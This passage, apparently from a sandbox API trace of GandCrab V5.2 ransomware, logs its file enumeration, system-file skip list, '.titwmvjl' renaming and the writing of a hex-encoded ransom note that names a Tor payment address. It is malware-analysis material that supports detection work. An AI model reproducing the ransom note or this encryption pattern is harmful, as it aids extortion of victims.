x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0072.179] WriteFile (in: hFile=0x2bc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259ed4c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259ed4c*=0x2162, lpOverlapped=0x0) returned 1 [0072.180] CloseHandle (hObject=0x2bc) returned 1 [0072.180] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.180] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.181] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x11, wMilliseconds=0x1f0)) [0072.181] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.181] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0072.181] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0072.181] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\d2ca4a09d2ca4deb61a.lock") returned 78 [0072.181] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\excel\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2bc [0072.182] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.182] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.182] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\") returned 54 [0072.182] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\*" [0072.182] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\*", fInfoLevelId=0x1, lpFindFileData=0x259ed68, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259ed68) returned 0x503638 [0072.182] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.182] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.183] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.183] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.183] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.183] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0072.183] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0072.183] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\d2ca4a09d2ca4deb61a.lock" [0072.183] lstrlenW (lpString=".titwmvjl") returned 9 [0072.183] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\d2ca4a09d2ca4deb61a.lock") returned 78 [0072.183] VirtualAlloc (lpAddress=0x0, dwSize=0xdc, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.183] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 87 [0072.184] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\d2ca4a09d2ca4deb61a.lock") returned 78 [0072.184] lstrlenW (lpString=".lock") returned 5 [0072.184] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.184] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".lock ") returned 6 [0072.184] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.184] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.184] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.184] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0072.184] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0072.184] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\TITWMVJL-DECRYPT.txt" [0072.184] lstrlenW (lpString=".titwmvjl") returned 9 [0072.184] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\TITWMVJL-DECRYPT.txt") returned 74 [0072.184] VirtualAlloc (lpAddress=0x0, dwSize=0xd4, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.185] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 83 [0072.185] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\TITWMVJL-DECRYPT.txt") returned 74 [0072.185] lstrlenW (lpString=".txt") returned 4 [0072.185] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0072.185] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0072.185] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0072.185] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.185] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\TITWMVJL-DECRYPT.txt") returned 74 [0072.185] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\TITWMVJL-DECRYPT.txt") returned 74 [0072.185] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0072.185] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0072.185] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0072.185] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0072.185] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0072.185] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0072.185] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0072.186] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0072.186] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.186] FindNextFileW (in: hFindFile=0x503638, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0072.186] lstrcmpW (lpString1="XLSTART", lpString2=".") returned 1 [0072.186] lstrcmpW (lpString1="XLSTART", lpString2="..") returned 1 [0072.186] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\", lpString2="XLSTART" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART" [0072.186] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\" [0072.186] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0072.186] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.186] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0072.187] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.187] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0072.187] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.187] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0072.187] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0072.187] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x25d0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0072.187] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0072.188] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0072.188] wsprintfW (in: param_1=0x25d0200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\\\TITWMVJL-DECRYPT.txt") returned 83 [0072.188] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\excel\\xlstart\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0072.188] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x7